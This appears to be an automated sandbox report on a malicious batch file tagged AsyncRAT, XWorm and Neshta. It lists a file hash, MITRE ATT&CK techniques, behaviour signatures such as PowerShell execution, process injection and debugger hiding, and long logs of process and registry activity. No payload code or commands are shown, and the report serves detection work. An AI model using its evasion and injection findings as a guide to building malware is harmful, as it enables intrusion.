Malware Analysis Report

2024-09-11 02:56

Sample ID 240523-w57d6abh41
Target new.cmd
SHA256 56bf257d93c8797219d10fcc94e0ffee4859109c8799a925f828126f1e9b12d0
Tags
asyncrat xworm default venom clients execution rat trojan neshta persistence spyware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

56bf257d93c8797219d10fcc94e0ffee4859109c8799a925f828126f1e9b12d0

Threat Level: Known bad

The file new.cmd was found to be: Known bad.

Malicious Activity Summary

asyncrat xworm default venom clients execution rat trojan neshta persistence spyware

Xworm

Suspicious use of NtCreateUserProcessOtherParentProcess

AsyncRat

Detect Xworm Payload

Neshta

Async RAT payload

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Executes dropped EXE

Loads dropped DLL

Checks computer location settings

Modifies system executable filetype association

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of SetThreadContext

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Views/modifies file attributes

Suspicious behavior: MapViewOfSection

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious behavior: GetForegroundWindowSpam

Modifies Internet Explorer settings

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Delays execution with timeout.exe

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Command and Scripting Interpreter
T1059
PowerShell
T1059.001
Persistence
TA0003
Event Triggered Execution
T1546
Change Default File Association
T1546.001
Privilege Escalation
TA0004
Event Triggered Execution
T1546
Change Default File Association
T1546.001
Defense Evasion
TA0005
Modify Registry
T1112
Hide Artifacts
T1564
Hidden Files and Directories
T1564.001
Credential Access
TA0006
Discovery
TA0007
Query Registry
T1012
System Information Discovery
T1082
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-05-23 18:31

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-23 18:31

Reported

2024-05-23 19:04

Platform

win10-20240404-en

Max time kernel

138s

Max time network

498s

Command Line

C:\Windows\Explorer.EXE

Signatures

AsyncRat

rat asyncrat

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 4580 created 3324 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\Explorer.EXE
PID 708 created 3324 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\Explorer.EXE
PID 1744 created 3324 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\Explorer.EXE
PID 2680 created 3324 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\Explorer.EXE

Xworm

trojan rat xworm

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\ESE.TXT C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File created C:\Windows\rescache\_merged\3720402701\1568373884.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File created C:\Windows\rescache\_merged\3720402701\1568373884.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\1568373884.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\browser_broker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\NextPromptBuild = "15063" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "268435456" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 01000000151bb1bd85e183232f0a0e421e1c58136d42f08189bb34132a8cf0fa46661199fdf3e106cef646cc51ea4359cb5cdbeb9f291521078e78efe09c C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames\en-US = "en-US.1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\FileVersion = "2016061511" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$WordPress C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus\SignaturePolicy = 06000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\History\CacheLimit = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$vBulletin 4 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\NextUpdateDate = "423270825" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\ACGStatus\ACGPolicyState = "8" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$MediaWiki C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\CTLs C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\ACGStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Cookies\CacheLimit = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer\Main\OperationalData = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "395205405" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 6979b4d63fadda01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CacheLimit = "256000" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\ACGStatus\DynamicCodePolicy = 05000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Content C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
